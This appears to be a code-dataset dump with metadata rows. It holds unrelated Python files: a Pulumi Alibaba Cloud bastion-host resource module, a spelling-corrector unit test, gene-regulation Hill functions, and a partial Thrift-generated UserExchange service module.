        > **NOTE:** Available in v1.135.0+.
        ## Example Usage
        Basic Usage
        ```python
        import pulumi
        import pulumi_alicloud as alicloud

        default_host = alicloud.bastionhost.Host("defaultHost",
            instance_id="bastionhost-cn-tl32bh0no30",
            host_name=var["name"],
            active_address_type="Private",
            host_private_address="172.16.0.10",
            os_type="Linux",
            source="Local")
        default_host_account = []
        for range in [{"value": i} for i in range(0, 3)]:
            default_host_account.append(alicloud.bastionhost.HostAccount(f"defaultHostAccount-{range['value']}",
                instance_id=default_host.instance_id,
                host_account_name=f"example_value-{range['value']}",
                host_id=default_host.host_id,
                protocol_name="SSH",
                password="YourPassword12345"))
        default_user_group = alicloud.bastionhost.UserGroup("defaultUserGroup",
            instance_id="bastionhost-cn-tl32bh0no30",
            user_group_name=var["name"])
        default_host_account_user_group_attachment = alicloud.bastionhost.HostAccountUserGroupAttachment("defaultHostAccountUserGroupAttachment",
            instance_id=default_host.instance_id,
            user_group_id=default_user_group.user_group_id,
            host_id=default_host.host_id,
            host_account_ids=[__item.host_account_id for __item in default_host_account])
        ```
        ## Import
        Bastion Host Host Account can be imported using the id, e.g.
        ```sh
        $ pulumi import alicloud:bastionhost/hostAccountUserGroupAttachment:HostAccountUserGroupAttachment example <instance_id>:<user_group_id>:<host_id>
        ```
        :param str resource_name: The name of the resource.
        :param HostAccountUserGroupAttachmentArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Real constructor: decide whether the caller used the args-object
        # overload or the keyword-argument overload, then delegate.
        resource_args, opts = _utilities.get_resource_args_opts(HostAccountUserGroupAttachmentArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 host_account_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 host_id: Optional[pulumi.Input[str]] = None,
                 instance_id: Optional[pulumi.Input[str]] = None,
                 user_group_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        # opts.id set means "adopt an existing resource": properties must
        # then come from the provider, not from __props__.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = HostAccountUserGroupAttachmentArgs.__new__(HostAccountUserGroupAttachmentArgs)

            # All four properties are required unless the resource is being
            # looked up by URN.
            if host_account_ids is None and not opts.urn:
                raise TypeError("Missing required property 'host_account_ids'")
            __props__.__dict__["host_account_ids"] = host_account_ids
            if host_id is None and not opts.urn:
                raise TypeError("Missing required property 'host_id'")
            __props__.__dict__["host_id"] = host_id
            if instance_id is None and not opts.urn:
                raise TypeError("Missing required property 'instance_id'")
            __props__.__dict__["instance_id"] = instance_id
            if user_group_id is None and not opts.urn:
                raise TypeError("Missing required property 'user_group_id'")
            __props__.__dict__["user_group_id"] = user_group_id
        super(HostAccountUserGroupAttachment, __self__).__init__(
            'alicloud:bastionhost/hostAccountUserGroupAttachment:HostAccountUserGroupAttachment',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            host_account_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            host_id: Optional[pulumi.Input[str]] = None,
            instance_id: Optional[pulumi.Input[str]] = None,
            user_group_id: Optional[pulumi.Input[str]] = None) -> 'HostAccountUserGroupAttachment':
        """
        Get an existing HostAccountUserGroupAttachment resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] host_account_ids: A list IDs of the host account.
        :param pulumi.Input[str] host_id: The ID of the host.
        :param pulumi.Input[str] instance_id: The ID of the Bastionhost instance where you want to authorize the user group to manage the specified hosts and host accounts.
        :param pulumi.Input[str] user_group_id: The ID of the user group that you want to authorize to manage the specified hosts and host accounts.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _HostAccountUserGroupAttachmentState.__new__(_HostAccountUserGroupAttachmentState)

        __props__.__dict__["host_account_ids"] = host_account_ids
        __props__.__dict__["host_id"] = host_id
        __props__.__dict__["instance_id"] = instance_id
        __props__.__dict__["user_group_id"] = user_group_id
        return HostAccountUserGroupAttachment(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="hostAccountIds")
    def host_account_ids(self) -> pulumi.Output[Sequence[str]]:
        """
        A list IDs of the host account.
        """
        return pulumi.get(self, "host_account_ids")

    @property
    @pulumi.getter(name="hostId")
    def host_id(self) -> pulumi.Output[str]:
        """
        The ID of the host.
        """
        return pulumi.get(self, "host_id")

    @property
    @pulumi.getter(name="instanceId")
    def instance_id(self) -> pulumi.Output[str]:
        """
        The ID of the Bastionhost instance where you want to authorize the user group to manage the specified hosts and host accounts.
        """
        return pulumi.get(self, "instance_id")

    @property
    @pulumi.getter(name="userGroupId")
    def user_group_id(self) -> pulumi.Output[str]:
        """
        The ID of the user group that you want to authorize to manage the specified hosts and host accounts.
        """
        return pulumi.get(self, "user_group_id")
| 44.881266
| 172
| 0.65873
| 2,059
| 17,010
| 5.174356
| 0.094221
| 0.071241
| 0.070959
| 0.019711
| 0.812183
| 0.796227
| 0.786934
| 0.76009
| 0.74648
| 0.727332
| 0
| 0.004763
| 0.247149
| 17,010
| 378
| 173
| 45
| 0.82719
| 0.407937
| 0
| 0.564972
| 1
| 0
| 0.11642
| 0.01974
| 0
| 0
| 0
| 0
| 0
| 1
| 0.152542
| false
| 0.00565
| 0.028249
| 0
| 0.271186
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
80a5408b335eed74b00a7bd72beabf1350c963ce
| 4,010
|
py
|
Python
|
test_spelling_corrector.py
|
mustafaKus/spellcheck
|
11f6f923b1427176781bd39cba9aa5d14130332d
|
[
"MIT"
] | 6
|
2020-12-20T07:22:08.000Z
|
2022-02-02T07:14:36.000Z
|
test_spelling_corrector.py
|
mustafaKus/spellcheck
|
11f6f923b1427176781bd39cba9aa5d14130332d
|
[
"MIT"
] | null | null | null |
test_spelling_corrector.py
|
mustafaKus/spellcheck
|
11f6f923b1427176781bd39cba9aa5d14130332d
|
[
"MIT"
] | null | null | null |
"""Implements the test class for the spelling corrector"""
import json
import logging
import os
import sys
import unittest
from unittest import TestCase
from spelling_corrector import NorvigCorrector, SymmetricDeleteCorrector
class SpellingCorrectorTest(TestCase):
    """Implements the test class for the spelling corrector"""

    def _run_corrector_cases(self, corrector_factory, corrector_description):
        """Run every fixture under ./tests against one corrector implementation.

        This is the (previously duplicated) body shared by both test methods.

        :param corrector_factory: callable mapping a word->frequency dict to a
            corrector object that exposes ``correct(word)``.
        :param corrector_description: human-readable name used in log messages.
        """
        current_working_directory = os.path.abspath(os.getcwd())
        tests_directory = os.path.join(current_working_directory, "tests")
        logging.info("Tests the %s" % corrector_description)
        logging.info("Tests directory is %s" % tests_directory)
        for test_directory_name in os.listdir(tests_directory):
            logging.info("Testing in %s directory" % test_directory_name)
            test_directory_path = os.path.join(tests_directory, test_directory_name)
            dictionary_path = os.path.join(test_directory_path, "dictionary.txt")
            test_input_2_expected_output_path = os.path.join(
                test_directory_path, "input_2_expected_output.json")
            # Build the word -> frequency map the corrector is seeded with.
            word_2_frequency = {}
            with open(dictionary_path, "r") as dictionary_file:
                logging.info("Reading the dictionary %s" % test_directory_name)
                for line in dictionary_file.readlines():
                    word, frequency_value = line.strip().split()
                    word_2_frequency[word.lower()] = int(frequency_value)
            spelling_corrector = corrector_factory(word_2_frequency)
            with open(test_input_2_expected_output_path) as input_2_expected_output_file:
                logging.info("Reading the test data")
                input_2_expected_output = json.load(input_2_expected_output_file)
            for input_, expected_output in input_2_expected_output.items():
                logging.info("Expected output for the input '%s' is '%s'" % (input_, expected_output))
                self.assertEqual(expected_output, spelling_corrector.correct(input_))

    def test_norvig_corrector(self):
        """Tests the norvig corrector"""
        self._run_corrector_cases(NorvigCorrector, "norvig corrector")

    def test_symmetric_delete_corrector(self):
        """Tests the symmetric delete corrector"""
        self._run_corrector_cases(SymmetricDeleteCorrector, "symmetric delete corrector")
# Running this module directly: route DEBUG-level logging to stdout and hand
# control to unittest's CLI test runner.
if __name__ == '__main__':
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    unittest.main()
| 55.694444
| 113
| 0.684289
| 473
| 4,010
| 5.46723
| 0.154334
| 0.119103
| 0.075793
| 0.108275
| 0.856148
| 0.841454
| 0.841454
| 0.841454
| 0.806651
| 0.806651
| 0
| 0.006485
| 0.230923
| 4,010
| 71
| 114
| 56.478873
| 0.832036
| 0.042145
| 0
| 0.711864
| 0
| 0
| 0.112565
| 0.01466
| 0
| 0
| 0
| 0
| 0.033898
| 1
| 0.033898
| false
| 0
| 0.118644
| 0
| 0.169492
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
03f90b9c017571d5e21e3b7da29f1645b4a33491
| 85
|
py
|
Python
|
service/models/__init__.py
|
CottageLabs/lodestone
|
2e60f2138a49633398655bb7f728fd3d6ac92c43
|
[
"Apache-2.0"
] | null | null | null |
service/models/__init__.py
|
CottageLabs/lodestone
|
2e60f2138a49633398655bb7f728fd3d6ac92c43
|
[
"Apache-2.0"
] | null | null | null |
service/models/__init__.py
|
CottageLabs/lodestone
|
2e60f2138a49633398655bb7f728fd3d6ac92c43
|
[
"Apache-2.0"
] | null | null | null |
from service.models.ethesis import Ethesis
from service.models.dataset import Dataset
| 42.5
| 42
| 0.870588
| 12
| 85
| 6.166667
| 0.5
| 0.297297
| 0.459459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082353
| 85
| 2
| 43
| 42.5
| 0.948718
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ff18e68d25414cdb3fdcaa970634bcf4be8109ba
| 7,008
|
py
|
Python
|
biocircuits/reg.py
|
justinbois/biocircuits
|
4f696be5a240ce6157e331d67bb78c3b2b3b88cf
|
[
"BSD-3-Clause"
] | 3
|
2021-03-08T06:19:39.000Z
|
2022-03-27T12:59:51.000Z
|
biocircuits/reg.py
|
justinbois/be150
|
96afe62ff40276f81d8a86eaa7b54d442517eec7
|
[
"BSD-3-Clause"
] | 7
|
2019-04-14T22:14:20.000Z
|
2021-05-07T16:51:05.000Z
|
biocircuits/reg.py
|
justinbois/be150
|
96afe62ff40276f81d8a86eaa7b54d442517eec7
|
[
"BSD-3-Clause"
] | 4
|
2019-04-14T21:24:55.000Z
|
2022-03-27T12:59:58.000Z
|
def rep_hill(x, n):
    """Repressive Hill function.

    Dimensionless production rate of a gene repressed by ``x``.

    Parameters
    ----------
    x : float or NumPy array
        Repressor concentration.
    n : float
        Hill coefficient.

    Returns
    -------
    float or NumPy array
        ``1 / (1 + x**n)``.
    """
    denominator = 1.0 + x ** n
    return 1.0 / denominator
def act_hill(x, n):
    """Activating Hill function.

    Dimensionless production rate of a gene activated by ``x``.

    Parameters
    ----------
    x : float or NumPy array
        Activator concentration.
    n : float
        Hill coefficient.

    Returns
    -------
    float or NumPy array
        ``x**n / (1 + x**n)``.
    """
    # One minus the repressive Hill function (helper call inlined).
    return 1.0 - 1.0 / (1.0 + x ** n)
def aa_and(x, y, nx, ny):
    """Two-activator regulation with AND logic, no leakage.

    Parameters
    ----------
    x : float or NumPy array
        Concentration of the first activator.
    y : float or NumPy array
        Concentration of the second activator.
    nx : float
        Hill coefficient of the first activator.
    ny : float
        Hill coefficient of the second activator.

    Returns
    -------
    float or NumPy array
        ``x**nx * y**ny / (1 + x**nx) / (1 + y**ny)``.
    """
    x_act = x ** nx
    y_act = y ** ny
    return x_act * y_act / (1.0 + x_act) / (1.0 + y_act)
def aa_or(x, y, nx, ny):
    """Two-activator regulation with OR logic, no leakage.

    Parameters
    ----------
    x : float or NumPy array
        Concentration of the first activator.
    y : float or NumPy array
        Concentration of the second activator.
    nx : float
        Hill coefficient of the first activator.
    ny : float
        Hill coefficient of the second activator.

    Returns
    -------
    float or NumPy array
        ``(x**nx + y**ny + x**nx * y**ny) / (1 + x**nx) / (1 + y**ny)``,
        computed as ``(D - 1) / D`` with ``D = (1 + x**nx) * (1 + y**ny)``.
    """
    occupancy = (1.0 + x ** nx) * (1.0 + y ** ny)
    return (occupancy - 1.0) / occupancy
def aa_or_single(x, y, nx, ny):
    """Two-activator regulation with OR logic, no leakage, single occupancy.

    Parameters
    ----------
    x : float or NumPy array
        Concentration of the first activator.
    y : float or NumPy array
        Concentration of the second activator.
    nx : float
        Hill coefficient of the first activator.
    ny : float
        Hill coefficient of the second activator.

    Returns
    -------
    float or NumPy array
        ``(x**nx + y**ny) / (1 + x**nx + y**ny)``.
    """
    weight = x ** nx + y ** ny
    return weight / (1.0 + weight)
def rr_and(x, y, nx, ny):
    """Two-repressor regulation with AND logic, no leakage.

    Parameters
    ----------
    x : float or NumPy array
        Concentration of the first repressor.
    y : float or NumPy array
        Concentration of the second repressor.
    nx : float
        Hill coefficient of the first repressor.
    ny : float
        Hill coefficient of the second repressor.

    Returns
    -------
    float or NumPy array
        ``1 / (1 + x**nx) / (1 + y**ny)``.
    """
    x_bound = 1.0 + x ** nx
    y_bound = 1.0 + y ** ny
    return 1.0 / x_bound / y_bound
def rr_and_single(x, y, nx, ny):
    """Two-repressor regulation with AND logic, no leakage, single occupancy.

    Parameters
    ----------
    x : float or NumPy array
        Concentration of the first repressor.
    y : float or NumPy array
        Concentration of the second repressor.
    nx : float
        Hill coefficient of the first repressor.
    ny : float
        Hill coefficient of the second repressor.

    Returns
    -------
    float or NumPy array
        ``1 / (1 + x**nx + y**ny)``.
    """
    total = 1.0 + x ** nx + y ** ny
    return 1.0 / total
def rr_or(x, y, nx, ny):
    """Dimensionless production rate for a gene regulated by two
    repressors with OR logic in the absence of leakage.

    Parameters
    ----------
    x : float or NumPy array
        Concentration of first repressor.
    y : float or NumPy array
        Concentration of second repressor.
    nx : float
        Hill coefficient for first repressor.
    ny : float
        Hill coefficient for second repressor.

    Returns
    -------
    output : NumPy array or float
        (1 + x**nx + y**ny) / (1 + x**nx) / (1 + y**ny)
    """
    # OR repression: only the doubly-bound state is silent, so every
    # state except x-and-y-bound contributes to the numerator.
    wx = x ** nx
    wy = y ** ny
    return (1.0 + wx + wy) / (1.0 + wx) / (1.0 + wy)
def ar_and(x, y, nx, ny):
    """Dimensionless production rate for a gene regulated by one
    activator and one repressor with AND logic in the absence of
    leakage.

    Parameters
    ----------
    x : float or NumPy array
        Concentration of activator.
    y : float or NumPy array
        Concentration of repressor.
    nx : float
        Hill coefficient for activator.
    ny : float
        Hill coefficient for repressor.

    Returns
    -------
    output : NumPy array or float
        x ** nx / (1 + x**nx) / (1 + y**ny)
    """
    # Activating Hill function attenuated by the repressor's factor.
    act = x ** nx
    return act / (1.0 + act) / (1.0 + y ** ny)
def ar_or(x, y, nx, ny):
    """Dimensionless production rate for a gene regulated by one
    activator and one repressor with OR logic in the absence of
    leakage.

    Parameters
    ----------
    x : float or NumPy array
        Concentration of activator.
    y : float or NumPy array
        Concentration of repressor.
    nx : float
        Hill coefficient for activator.
    ny : float
        Hill coefficient for repressor.

    Returns
    -------
    output : NumPy array or float
        (1 + x**nx + x**nx * y**ny) / (1 + x**nx) / (1 + y**ny)
    """
    # Numerator 1 + x**nx*(1 + y**ny) expands to 1 + x**nx + x**nx*y**ny:
    # every state except repressor-bound-alone is productive.
    return (1.0 + x ** nx * (1.0 + y ** ny)) / (1.0 + x ** nx) / (1.0 + y ** ny)
def ar_and_single(x, y, nx, ny):
    """Dimensionless production rate for a gene regulated by one
    activator and one repressor with AND logic in the absence of
    leakage with single occupancy.

    Parameters
    ----------
    x : float or NumPy array
        Concentration of activator.
    y : float or NumPy array
        Concentration of repressor.
    nx : float
        Hill coefficient for activator.
    ny : float
        Hill coefficient for repressor.

    Returns
    -------
    output : NumPy array or float
        x ** nx / (1 + x**nx + y**ny)
    """
    # Single occupancy: only the activator-bound state is productive,
    # and all three states (empty, x-bound, y-bound) compete.
    act = x ** nx
    return act / (1.0 + act + y ** ny)
def ar_or_single(x, y, nx, ny):
    """Dimensionless production rate for a gene regulated by one
    activator and one repressor with OR logic in the absence of
    leakage with single occupancy.

    Parameters
    ----------
    x : float or NumPy array
        Concentration of activator.
    y : float or NumPy array
        Concentration of repressor.
    nx : float
        Hill coefficient for activator.
    ny : float
        Hill coefficient for repressor.

    Returns
    -------
    output : NumPy array or float
        (1 + x**nx) / (1 + x**nx + y**ny)
    """
    # Empty and activator-bound states produce; the repressor-bound
    # state is the only silent one in the partition function.
    productive = 1.0 + x ** nx
    return productive / (productive + y ** ny)
| 25.67033
| 80
| 0.56835
| 954
| 7,008
| 4.157233
| 0.056604
| 0.027231
| 0.066566
| 0.094302
| 0.975794
| 0.971508
| 0.965709
| 0.960918
| 0.955119
| 0.908976
| 0
| 0.015843
| 0.315497
| 7,008
| 272
| 81
| 25.764706
| 0.810923
| 0.728881
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.461538
| false
| 0
| 0
| 0
| 0.923077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
207fd602e53b75231f396c0ed8874c586d12e870
| 17,721
|
py
|
Python
|
thrift/gen-py/hello/UserExchange.py
|
amitsaha/playground
|
82cb5ac02ac90d3fa858a5153b0a5705187c14ce
|
[
"Unlicense"
] | 4
|
2018-04-14T16:28:39.000Z
|
2021-11-14T12:08:02.000Z
|
thrift/gen-py/hello/UserExchange.py
|
amitsaha/playground
|
82cb5ac02ac90d3fa858a5153b0a5705187c14ce
|
[
"Unlicense"
] | 3
|
2022-02-14T10:38:51.000Z
|
2022-02-27T16:01:16.000Z
|
thrift/gen-py/hello/UserExchange.py
|
amitsaha/playground
|
82cb5ac02ac90d3fa858a5153b0a5705187c14ce
|
[
"Unlicense"
] | 4
|
2015-07-07T01:01:27.000Z
|
2019-04-12T05:38:26.000Z
|
#
# Autogenerated by Thrift Compiler (0.9.1)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
  """Abstract service interface for the UserExchange Thrift service.
  Server-side handlers implement these methods; the generated Client
  class mirrors them on the caller side.
  """
  def ping(self):
    # Health-check RPC: no arguments, no result.
    pass

  def add_user(self, u):
    """
    Parameters:
     - u
    """
    pass

  def get_user(self, uid):
    """
    Parameters:
     - uid
    """
    pass

  def clear_list(self):
    # The generated client only sends this call and never reads a reply.
    pass
class Client(Iface):
  """Generated client-side proxy for the UserExchange service.
  Each RPC ``foo`` is split into ``send_foo`` (serialize the call onto
  the output protocol) and ``recv_foo`` (read and decode the reply).
  ``clear_list`` is send-only: no reply is read for it.
  """
  def __init__(self, iprot, oprot=None):
    # With a single protocol argument, the same protocol is used for
    # both reading and writing.
    self._iprot = self._oprot = iprot
    if oprot is not None:
      self._oprot = oprot
    self._seqid = 0

  def ping(self):
    self.send_ping()
    self.recv_ping()

  def send_ping(self):
    self._oprot.writeMessageBegin('ping', TMessageType.CALL, self._seqid)
    args = ping_args()
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()

  def recv_ping(self):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      # Application-level failure reported by the server.
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = ping_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    return

  def add_user(self, u):
    """
    Parameters:
     - u
    """
    self.send_add_user(u)
    return self.recv_add_user()

  def send_add_user(self, u):
    self._oprot.writeMessageBegin('add_user', TMessageType.CALL, self._seqid)
    args = add_user_args()
    args.u = u
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()

  def recv_add_user(self):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = add_user_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
      return result.success
    if result.e is not None:
      # Declared service exception travels back inside the result struct.
      raise result.e
    raise TApplicationException(TApplicationException.MISSING_RESULT, "add_user failed: unknown result");

  def get_user(self, uid):
    """
    Parameters:
     - uid
    """
    self.send_get_user(uid)
    return self.recv_get_user()

  def send_get_user(self, uid):
    self._oprot.writeMessageBegin('get_user', TMessageType.CALL, self._seqid)
    args = get_user_args()
    args.uid = uid
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()

  def recv_get_user(self):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = get_user_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
      return result.success
    if result.e is not None:
      raise result.e
    raise TApplicationException(TApplicationException.MISSING_RESULT, "get_user failed: unknown result");

  def clear_list(self):
    # Send-only call: no recv_clear_list is generated, no reply awaited.
    self.send_clear_list()

  def send_clear_list(self):
    self._oprot.writeMessageBegin('clear_list', TMessageType.CALL, self._seqid)
    args = clear_list_args()
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
class Processor(Iface, TProcessor):
  """Generated server-side dispatcher for the UserExchange service.
  Maps incoming message names to ``process_*`` methods that decode the
  arguments, invoke the wrapped handler, and write the reply.
  NOTE(review): uses Python-2-only ``except Exc, e`` syntax (Thrift
  0.9.1 output); this module cannot run under Python 3 as-is.
  """
  def __init__(self, handler):
    self._handler = handler
    self._processMap = {}
    self._processMap["ping"] = Processor.process_ping
    self._processMap["add_user"] = Processor.process_add_user
    self._processMap["get_user"] = Processor.process_get_user
    self._processMap["clear_list"] = Processor.process_clear_list

  def process(self, iprot, oprot):
    (name, type, seqid) = iprot.readMessageBegin()
    if name not in self._processMap:
      # Unknown method: drain the payload and report an exception back.
      iprot.skip(TType.STRUCT)
      iprot.readMessageEnd()
      x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
      oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
      x.write(oprot)
      oprot.writeMessageEnd()
      oprot.trans.flush()
      return
    else:
      self._processMap[name](self, seqid, iprot, oprot)
    return True

  def process_ping(self, seqid, iprot, oprot):
    args = ping_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = ping_result()
    self._handler.ping()
    oprot.writeMessageBegin("ping", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()

  def process_add_user(self, seqid, iprot, oprot):
    args = add_user_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = add_user_result()
    try:
      result.success = self._handler.add_user(args.u)
    except InvalidValueException, e:
      # Declared exception is shipped back inside the result struct.
      result.e = e
    oprot.writeMessageBegin("add_user", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()

  def process_get_user(self, seqid, iprot, oprot):
    args = get_user_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_user_result()
    try:
      result.success = self._handler.get_user(args.uid)
    except InvalidValueException, e:
      result.e = e
    oprot.writeMessageBegin("get_user", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()

  def process_clear_list(self, seqid, iprot, oprot):
    # Send-only call on the client side: handler runs, no reply written.
    args = clear_list_args()
    args.read(iprot)
    iprot.readMessageEnd()
    self._handler.clear_list()
    return
# HELPER FUNCTIONS AND STRUCTURES
class ping_args:
  """Argument struct for ping(); the call carries no fields."""
  thrift_spec = (
  )
  def read(self, iprot):
    # Fast path: C-accelerated decoding when the accelerated binary
    # protocol and the fastbinary extension are both available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        # No declared fields: skip anything the peer sent.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('ping_args')
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # NOTE(review): __dict__.iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class ping_result:
  """Result struct for ping(); a void reply, so no fields."""
  thrift_spec = (
  )
  def read(self, iprot):
    # Fast path: C-accelerated decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        # No declared fields: skip anything the peer sent.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('ping_result')
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # NOTE(review): __dict__.iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class add_user_args:
  """Argument struct for add_user().
  Attributes:
   - u: User struct to add (field id 1).
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'u', (User, User.thrift_spec), None, ), # 1
  )
  def __init__(self, u=None,):
    self.u = u

  def read(self, iprot):
    # Fast path: C-accelerated decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.u = User()
          self.u.read(iprot)
        else:
          # Type mismatch on the wire: skip the unexpected value.
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('add_user_args')
    if self.u is not None:
      oprot.writeFieldBegin('u', TType.STRUCT, 1)
